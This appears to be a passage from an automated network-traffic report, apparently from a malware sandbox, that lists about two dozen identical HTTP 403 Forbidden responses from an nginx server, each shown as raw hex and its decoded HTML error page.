            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:21 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:21 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:22 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:22 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:23 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:24 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:24 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:25 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:25 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:26 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:26 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:27 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:28 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:29 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:29 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:30 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:31 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:31 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:32 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:32 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:33 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:33 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:34 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:34 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:35 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:18:36 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
